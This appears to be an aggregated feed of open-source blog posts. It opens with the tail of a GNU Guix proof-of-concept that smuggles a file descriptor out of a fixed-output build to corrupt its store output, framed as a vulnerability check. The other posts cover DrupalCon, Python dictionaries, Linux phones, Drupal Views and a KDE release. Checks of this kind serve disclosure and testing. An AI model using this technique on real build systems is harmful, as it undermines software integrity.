wait..\\n\"); return 0; } hdr = CMSG_NXTHDR(&msg, hdr); } close(a); } }")) (define nonce (string-append "-" (number->string (car (gettimeofday)) 16) "-" (number->string (getpid)))) (define original-text "This is the original text, before corruption.") (define derivation-that-exfiltrates-fd (computed-file (string-append "derivation-that-exfiltrates-fd" nonce) (with-imported-modules '((guix build utils)) #~(begin (use-modules (guix build utils)) (invoke #+(compiled-c-code "sender" sender-source)) (call-with-output-file #$output (lambda (port) (display #$original-text port))))) #:options `(#:hash-algo sha256 #:hash ,(sha256 (string->utf8 original-text))))) (define derivation-that-grabs-fd (computed-file (string-append "derivation-that-grabs-fd" nonce) #~(begin (open-output-file #$output) ;make sure there's an output (execl #+(compiled-c-code "receiver" receiver-source) "receiver")) #:options `(#:hash-algo sha256 #:hash ,(sha256 #vu8())))) (define check (computed-file "checking-for-vulnerability" #~(begin (use-modules (ice-9 textual-ports)) (mkdir #$output) ;make sure there's an output (format #t "This depends on ~a, which will grab the file descriptor and corrupt ~a.~%~%" #+derivation-that-grabs-fd #+derivation-that-exfiltrates-fd) (let ((content (call-with-input-file #+derivation-that-exfiltrates-fd get-string-all))) (format #t "Here is what we see in ~a: ~s~%~%" #+derivation-that-exfiltrates-fd content) (if (string=? content #$original-text) (format #t "Failed to corrupt ~a, \ your system is safe.~%" #+derivation-that-exfiltrates-fd) (begin (format #t "We managed to corrupt ~a, \ meaning that YOUR SYSTEM IS VULNERABLE!~%" #+derivation-that-exfiltrates-fd) (exit 1))))))) checkAbout GNU GuixGNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64, and POWER9 machines.
In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.
Drupal Association blog: Why You Should Attend Open Source Conferences
Network, Learn, and Collaborate - The three key motivations for individuals and organizations to participate in conferences. Every regular conference has a theme or niche that serves as a focal point for discussions and advancement. These events serve as stages for personal branding and business promotion, with attendees aiming to gain insights and contacts that directly benefit their individual goals and organizational interests.
Although open-source events rely on these key motivations too, they have a unique flavor of community spirit and collaboration that’s not found in traditional conferences. Open source events like DrupalCons thrive on shared knowledge, transparent innovation, and a sense of collective growth.
What is DrupalCon?DrupalCon is an annual open-source conference that brings together open-source enthusiasts, developers, designers, and end users for networking, learning, and collaboration, all under one roof. This is where you can meet the people who made the software, get inspired, and actively contribute to the project. The next upcoming DrupalCon North America event is being held in Portland, Oregon, from 06 May 2024 to 09 May 2024. We’ll give you some reasons why you should attend open-source events like DrupalCon 2024.
Benefits of Attending Open Source ConferencesAn open-source enthusiast knows that events like DrupalCons are celebrations of community-driven innovation. The energy is contagious, the ideas are limitless, and the camaraderie extends beyond the conference halls.
Spirit of Open-SourceOpen source is almost synonymous with collaboration. Collaboration by contributors who are the heartbeat of any open-source project. These events provide a platform for individuals and organizations to come together, contribute to the community, and drive the future of open source. It aligns with the open-source commitment to empowering innovation through the collective efforts of a vibrant and engaged community. In an event like DrupalCon, you get a chance to meet people who are passionate about Drupal and driving it forward.
Career BoostIf you're launching your career or contemplating a switch to something more fulfilling, few experiences rival the rewards of joining an open-source community. And there’s no better place to kick off this journey than an open-source conference. You’re not just exploring job opportunities but also gaining the knowledge you need from training sessions and meaningful interactions with seasoned experts. You can also upgrade your skills through hands-on workshops and interactive sessions at the event. At DrupalCon, you can always find support if you’re new to the world of Drupal or Open source. A mentor will help guide you through your entire experience by suggesting what sessions you should attend for your professional development. You can even learn to make your first contribution to the project through your mentor.
Spot the TrendWant to know what’s new in your area of interest? Open-source conferences are the best places to identify emerging trends, innovations, and shifts in the industry - much before they become mainstream! You come out well-equipped with insights into upcoming technologies and initiatives. This will not only help you in your professional development but also enable you to contribute meaningfully to innovative projects. All of this ultimately leads to improved user experiences and future-ready applications. At DrupalCon, immerse yourself in firsthand insights as Dries Buytaert, the founder himself, shares the current state of Drupal in his keynote (DriesNote). Discover upcoming initiatives and innovation on the horizon, and get a sneak peek into the exciting developments set to launch.
The Power of Open Source NetworkingWe all know how powerful networking can be for your career or business development. But for an open-source community, networking is an indispensable aspect. It's impossible to have a successfully operating community without networking. Open-source events let you connect with like-minded individuals, developers, agencies, and contributors, fostering potential collaboration. Get mentorship, guidance, and exposure to new opportunities to aid your professional growth. Attend DrupalCon to connect with thousands of open-source enthusiasts and build meaningful connections with professionals just like you. Programs like BoFs (Birds of a Feather) at DrupalCon let you exchange information and share best practices around a common topic of interest. Make DrupalCon your opportunity to grow.
Real-World LearningLearning from real-world scenarios truly refines your understanding of technology and innovation. Attending industry summits at open-source conferences is a great way to gain practical insights from industry leaders. It’s a chance to understand the real-world challenges faced by them and the practical solutions implemented. Through live demos, case studies, and applications, you can see the ropes in action. Industry summits often highlight the methodologies that are proving successful in the current landscape, providing actionable takeaways. DrupalCon has a full day dedicated to industry summits like the higher educational summit, non-profit summit, government summit and community summit.
Final ThoughtsWhether it's networking opportunities, hands-on learning, or trend forecasting, open-source conferences offer a holistic approach to staying on top of ever-changing technologies. They contribute to the collective growth of the entire open-source community. It's an investment in continuous learning, professional enrichment, and the boundless possibilities of open collaboration. Did we mention that DrupalCons aren't just about coding and tech talk? There's a ton of fun to be had too! Take a look at the social events from last year.
Real Python: Python Basics Exercises: Dictionaries
In plain English, a dictionary is a book containing the definitions of words. Each entry in a dictionary has two parts: the word being defined, and its definition.
Python dictionaries, like lists and tuples, store a collection of objects. However, instead of storing objects in a sequence, dictionaries hold information in pairs of data called key-value pairs. That is, each object in a dictionary has two parts: a key and a value. Each key is assigned a single value, which defines the relationship between the two sets.
In this video course, you’ll practice:
- What a dictionary is and how it’s structured
- How dictionaries differ from other data structures
- How to define and use dictionaries in your own code
This video course is part of the Python Basics series, which accompanies Python Basics: A Practical Introduction to Python 3. You can also check out the other Python Basics courses.
Note that you’ll be using IDLE to interact with Python throughout this course.
[ Improve Your Python With 🐍 Python Tricks 💌 – Get a short & sweet Python Trick delivered to your inbox every couple of days. >> Click here to learn more and see examples ]
Matt Glaman: Drupal has made contributing to open source a marketing opportunity
Drupal has done something unique with contributing to open source. Our community has made contributing to the open source project a marketing opportunity for organizations using Drupal. Generally, contributing to open source projects reflects at the individual level. There isn't a great way to reflect if the individual did it out of some intrinsic value to improve open source or by sponsored work with their employer or a customer. As far as I know, Drupal is the only open source project providing this kind of attribution.
ADCI Solutions: Speed up your website with React Server Components
The React team proposes a new way to improve page load speed and reduce TTI—the time it takes a page to become fully interactive.
***
One of the ways to improve website performance is to reduce traffic from the server to the user’s (client’s) device. The client-server architecture is essentially the queue of requests and responses between the client and the server, which in turn accesses the database.
Gradually, web development began to take on other tasks, such as where and how to cache the page or mark it up for SEO so that it could later go live and work for the user, or what part of the page rendering could be done by the client or by the server.
Eventually, there were developers who took the React library, built the Next framework around it, proposed the principle of Server-Side Rendering (or SSR) along with the framework.
Russell Coker: Android vs FOSS Phones
To achieve my aims regarding Convergence of mobile phone and PC [1] I need something a big bigger than the 4G of RAM that’s in the PinePhone Pro [2]. The PinePhonePro was released at the end of 2021 but has a SoC that was first released in 2016. That SoC seems to compare well to the ones used in the Pixel and Pixel 2 phones that were released in the same time period so it’s not a bad SoC, but it doesn’t compare well to more recent Android devices and it also isn’t a great fit for the non-Android things I want to do. Also the PinePhonePro and Librem5 have relatively short battery life so reusing Android functionality for power saving could provide a real benefit. So I want a phone designed for the mass market that I can use for running Debian.
PostmarketOSOne thing I’m definitely not going to do is attempt a full port of Linux to a different platform or support of kernel etc. So I need to choose a device that already has support from a somewhat free Linux system. The PostmarketOS system is the first I considered, the PostmarketOS Wiki page of supported devices [3] was the first place I looked. The “main” supported devices are the PinePhone (not Pro) and the Librem5, both of which are under-powered. For the “community” devices there seems to be nothing that supports calls, SMS, mobile data, and USB-OTG and which also has 4G of RAM or more. If I skip USB-OTG (which presumably means I’d have to get dock functionality via wifi – not impossible but not great) then I’m left with the SHIFT6mq which was never sold in Australia and the Xiomi POCO F1 which doesn’t appear to be available on ebay.
LineageOSThe libhybris libraries are a compatibility layer between Android and glibc programs [4]. Which includes running Wayland with Android display drivers. So running a somewhat standard Linux desktop on top of an Android kernel should be possible. Here is a table of the LineageOS supported devices that seem to have a useful feature set and are available in Australia and which could be used for running Debian with firmware and drivers copied from Android. I only checked LineageOS as it seems to be the main free Android build.
Phone RAM External Display Price Edge 20 Pro [5] 6-12G HDMI $500 not many on sale Edge S aka moto G100 [6] 6-8G HDMI $500 to $600+ Fairphone 4 6-8G USBC-DP $1000+ Nubia Red Magic 5G 8-16G USBC-DP $600+The LineageOS device search page [9] allows searching by kernel version. There are no phones with a 6.6 (2023) or 6.1 (2022) Linux kernel and only the Pixel 8/8Pro and the OnePlus 11 5G run 5.15 (2021). There are 8 Google devices (Pixel 6/7 and a tablet) running 5.10 (2020), 18 devices running 5.4 (2019), and 32 devices running 4.19 (2018). There are 186 devices running kernels older than 4.19 – which aren’t in the kernel.org supported release list [10]. The Pixel 8 Pro with 12G of RAM and the OnePlus 11 5G with 16G of RAM are appealing as portable desktop computers, until recently my main laptop had 8G of RAM. But they cost over $1000 second hand compared to $359 for my latest laptop.
Fosdem had an interesting lecture from two Fairphone employees about what they are doing to make phone production fairer for workers and less harmful for the environment [11]. But they don’t have the market power that companies like Google have to tell SoC vendors what they want.
IP Laws and PracticesBunnie wrote an insightful and informative blog post about the difference between intellectual property practices in China and US influenced countries and his efforts to reverse engineer a commonly used Chinese SoC [12]. This is a major factor in the lack of support for FOSS on phones and other devices.
Droidian and Buying a Note 9The FOSDEM 2023 has a lecture about the Droidian project which runs Debian with firmware and drivers from Android to make a usable mostly-FOSS system [13]. It’s interesting how they use containers for the necessary Android apps. Here is the list of devices supported by Droidian [14].
Two notable entries in the list of supported devices are the Volla Phone and Volla Phone 22 from Volla – a company dedicated to making open Android based devices [15]. But they don’t seem to be available on ebay and the new price of the Volla Phone 22 is E452 ($AU750) which is more than I want to pay for a device that isn’t as open as the Pine64 and Purism products. The Volla Phone 22 only has 4G of RAM.
Phone RAM Price Issues Note 9 128G/512G 6G/8G <$300 Not supporting external display Galaxy S9+ 6G <$300 Not supporting external display Xperia 5 6G >$300 Hotspot partly working OnePlus 3T 6G $200 – $400+ photos not workingI just bought a Note 9 with 128G of storage and 6G of RAM for $109 to try out Droidian, it has some screen burn but that’s OK for a test system and if I end up using it seriously I’ll just buy another that’s in as-new condition. With no support for an external display I’ll need to setup a software dock to do Convergence, but that’s not a serious problem. If I end up making a Note 9 with Droidian my daily driver then I’ll use the 512G/8G model for that and use the cheap one for testing.
MobianI should have checked the Mobian list first as it’s the main Debian variant for phones.
From the Mobian Devices list [16] the OnePlus 6T has 8G of RAM or more but isn’t available in Australia and costs more than $400 when imported. The PocoPhone F1 doesn’t seem to be available on ebay. The Shift6mq is made by a German company with similar aims to the Fairphone [17], it looks nice but costs E577 which is more than I want to spend and isn’t on the officially supported list.
Smart WatchesThe same issues apply to smart watches. AstereoidOS is a free smart phone OS designed for closed hardware [18]. I don’t have time to get involved in this sort of thing though, I can’t hack on every device I use.
- [1] https://etbe.coker.com.au/2023/05/29/considering-convergence/
- [2] https://en.wikipedia.org/wiki/PinePhone_Pro
- [3] https://wiki.postmarketos.org/wiki/Devices
- [4] https://en.wikipedia.org/wiki/Libhybris
- [5] https://wiki.lineageos.org/devices/pstar/
- [6] https://wiki.lineageos.org/devices/nio/variant1/
- [7] https://wiki.lineageos.org/devices/FP4/
- [8] https://wiki.lineageos.org/devices/nx659j/variant1/
- [9] https://wiki.lineageos.org/devices/
- [10] https://www.kernel.org/category/releases.html
- [11] https://tinyurl.com/ykdbxf4a
- [12] https://www.bunniestudios.com/blog/?p=4297
- [13] https://tinyurl.com/29jfaw4f
- [14] https://devices.droidian.org/
- [15] https://volla.online/en/
- [16] https://wiki.debian.org/Mobian/Devices
- [17] https://shop.shiftphones.com/shift6mq.html
- [18] https://asteroidos.org/watches/
Related posts:
- The Australian Open and Android Phones (Seer) On Monday the 25th of January 2010 I visited the...
- Dual SIM Phones vs Amaysim vs Contract for Mobile Phones Currently Dick Smith is offering two dual-SIM mobile phones for...
- Pixel 6A I have just bought a Pixel 6A [1] for my...
Specbee: Better Page Layouts with the CSS Grid Layout Module in Drupal
DrupalEasy: Reintroducing Drupal core's Views "Combine fields filter"
I was recently reminded of a Drupal core feature that I hadn't used in a long time - and was pleasantly surprised at how useful it is.
The Combine fields filter Views filter allows a site-builder to quickly and easily set up an exposed filter that searches multiple fields for a given search term. Think of it as a way to combine multiple exposed search filters into a single search box.
Setting it up is quite easy - just include all the fields that you want to search in the Fields section, marking them with Exclude from display as necessary (Unfortunately, Combine fields filter doesn't work with view modes.)
Then, add and expose a Combine fields filter to the view, and configure it to use all the fields you want searchable in the Choose fields to combine for filtering section of the filter's configuration:
I created a simple example of a Movie content type with example fields including Title, Image, Plot summary, Spoilers, Year of release, Short description, Taglines, and Trivia. I added all of these fields to the Fields configuration of the view - with all of them hidden except for Title and Image.
Next, I added a Combine fields filter as described above, selecting all of the fields to be combined for filtering. Finally, I added a few sample Movie nodes.
To test things out, I searched for terms that were added as part of the various Movie content type fields (but purposely not words in the Title fields). The results were exactly what I was expecting!
In the first example, the word biff appears in the Plot summary field for Back to the Future.
In the first example, the word biff appears in the Plot summary field for Back to the Future. Next, the word saga appears in the Short description field of The Last Jedi.The number 1985 appears in the Year of release field of Back to the Future.Finally, the words Michael Caine appear in the Trivia field of The Dark Knight.
There are a few caveats when using Combine fields filter with one of the more impactful being that when utilizing a multivalued field (as the Trivia and Taglines fields are in the previous example), the Multiple field settings configuration cannot utilize the Display all values in the same row option. Fortunately, these fields are usually excluded (hidden) from search views like this.
PreviousNext: How can free open source CMSes remain competitive with enterprise clients?
With Drupal now heavily used in the enterprise market by very large organisations, much of its direct competition is from well-funded proprietary products. From the perspective of my role on the Drupal Association board, I gave a talk at FOSDEM in February 2024 on the strategies and initiatives the Drupal community is starting to put in place to remain competitive in the enterprise market and how these approaches can be shared by other open source projects.
by Owen Lansbury / 12 March 2024The original of this video recording was first published on the FOSDEM website.
Drupal has historically had no centralised product management or marketing, let alone ANY coordinated budget! For comparison, Adobe spends around USD$2.7bn annually on product development, sales and marketing for its Experience Cloud product suite.
In the talk, I discuss Drupal's recent recognition as a Digital Public Good and the way that the Drupal community is highly motivated by providing world-class software for free to anyone who wants to use it, promoting values of freedom, inclusion, participation and empowerment. The Drupal Association recently released a manifesto that defines the Drupal project's commitment to the Open Web, but in order to fulfil this mission, Drupal needs to be successful as a product in the open market.
Since Drupal 8 was released in 2015, it has been specifically targeted at building "ambitious digital experiences." While this has resulted in an overall drop in Drupal installs as smaller sites move to SAAS platforms, the Drupal economy is robust, with an estimated USD$3 billion spent on Drupal-related projects each year.
Unlike other open source projects, Drupal doesn’t have a single company doing the majority of the code contribution. The Drupal Association has run on a budget of around $3.5m or 1/1000th of the revenue being spent on Drupal projects each year.
This was brought into focus for the Drupal Association during COVID when the primary source of income - running DrupalCon events - required an abrupt rethink. We had to refocus on how Drupal would be both successful and sustainable in the future. This has led to us recently embarking on a new strategy, where the Drupal Association play a more direct role in both Drupal product innovation and marketing.
Enterprise customers are key to maintaining a healthy ecosystem for a CMS. Their investment flows through to the agencies building, maintaining, supporting, and hosting large-scale projects, providing consistent, repeat income that ultimately benefits our open source community in the form of stable jobs, community funding, and sponsored code contribution.
Looking more closely at the challenges of succeeding in the enterprise market, how do you get access and awareness with key decision makers in large organisations like the CIO, CTO and, increasingly, the CMO (Chief Marketing Officer)? They are the people likely to read analyst reports from Gartner and Forrester. While Acquia features as a leader in these reports and relies heavily on Drupal for its platform, Drupal's name recognition is largely absent from these reports.
Acquia has also had great success with their Engage events that target key decision makers, but it's been a challenge to attract a similar audience to the more community and developer-focused DrupalCon events.
While the Drupal Association itself has historically had limited relationships with Drupal's large end users, partner agencies who rely on Drupal's open source software for their clients absolutely do have these relationships.
The Drupal Association is in a strong position to provide our agency partners with as much assistance as possible to either retain or win new enterprise clients through any playbook-style information we can provide. For example, do we have a pitch deck on hand to help an agency argue why Drupal is superior to Adobe or Sitecore? Are there pre-packaged product demos that can be consistently updated to highlight new features?
This is an area where we currently fall short in the Drupal community, with most agencies replicating efforts for every new client engagement. It's something we're starting to address with the Drupal Certified Partner program, however, if we can harness the strength of hundreds of agency salespeople pitching Drupal to their clients every day. New agencies joining a partner program need to see a clear pathway to building their teams' expertise and being able to sell Drupal to their clients to grow their businesses. The largest global digital agencies have tended to struggle with engaging with open source software communities, so bridging that gap is critical.
The other group of people we need to convince in any large organisation are the people who’ll be using our product - the developers, content editors and systems engineers. C-level decision-makers lean heavily on this group to evaluate and make recommendations about what platform they should be considering. To influence this group, our product needs to look and function like a modern piece of software, fulfil contemporary requirements or be quickly downloadable for a working demo of the software.
In terms of where we already clearly win, rapid innovation is the thing that we do very well in the open source world. Maintaining the speed of innovation, though, is an area that has been harder for Drupal as both the software and community have matured. A big philosophical hurdle we’ve faced is the notion of the Drupal Association directing budget to innovation projects when people often have an expectation that contribution is “free”. But contribution has never been free! An individual or company has always borne the cost in personal time or wages. Other big open source projects have absolutely no stigma about funding projects with actual money, such as the Linux Foundation's $160m annual funding towards projects.
The Drupal community dipped our toe into this model last year with the Pitchburgh contest, which saw $98,000 worth of projects get completed in a relatively short amount of time because they had the budget. We’re also in the process of hiring people at the Drupal Association who can facilitate innovation and remove roadblocks to contribution.
Now, all we need is the funding to scale this model up. Imagine if just 1% of the $3bn spent on Drupal-related projects each year went towards funding strategic innovation - that would be a $30m budget to work with!
Similarly, the idea that Drupal would be “marketed” as a product by the Drupal Association has never been a core competency. This is the legacy of being structured as a 501c3 not-for-profit in the USA where funds are for the “advancement of a charitable cause”. Our charitable cause is ensuring Drupal remains a Digital Public Good that supports the United Nations’ Sustainable Development Goals. But if there isn't positive product awareness about Drupal in the broader market, then market share will slip and our ability to support the goals around being a Digital Public Good will suffer as a result.
Whether we call it marketing or advocacy, we need to ensure Drupal as a product is commercially successful. We’ve had a Promote Drupal working group within the Drupal community for a number of years that has driven a range of broader marketing initiatives. The Drupal Association has now taken on an active role in this by commissioning a go-to-market strategy targeting the enterprise sector. This will be rolling out in 2024 as funding for specific marketing initiatives becomes available.
At the cheaper end of the scale, this might include coordinating speakers at non-Drupal tech events or managing positive media coverage. At a higher budget scale, it might include Drupal-branded booths at major tech conferences, like the one we recently built for Web Summit in Lisbon, or running global campaigns to build Drupal product awareness.
Our other huge advantage as an open source community is the strength and depth of our developer pool. We do encounter a perception issue when it comes to attracting younger developers to our platforms because there are so many shiny new things to play with. Building robust outreach, training, mentoring, certification and professional pathways is the key to maintaining a sustainable developer pool as those of us with 20+ years of experience head towards the other side of middle age.
So, where can you start to help with all of this?
If you're a professional services company that relies on Drupal for your business, get involved with the Drupal Certified Partner program. This is the fastest way to both contribute to Drupal's innovation as a product and play a direct role in driving adoption.
If you rely on Drupal as your organization's CMS software, become a Supporting Partner and help fund Drupal's sustainability.
If you're passionate about maintaining the Open Web, the Drupal Association can accept your philanthropic donation.
Send your team members to DrupalCon or a regional DrupalCamp to connect with the community.
This level of engagement will help Drupal maintain its status as the platform of choice for large-scale projects.
KDE Plasma 6.0.2, Bugfix Release for March
Tuesday, 12 March 2024. Today KDE releases a bugfix update to KDE Plasma 6, versioned 6.0.2.
This release adds a week's worth of new translations and fixes from KDE's contributors. The bugfixes are typically small but important and include:
- Fix sending window to all desktops. Commit. Fixes bug #482670
- Folder Model: Handle invalid URL in desktop file. Commit. Fixes bug #482889
- Fix panels being set to floating by upgrades. Commit.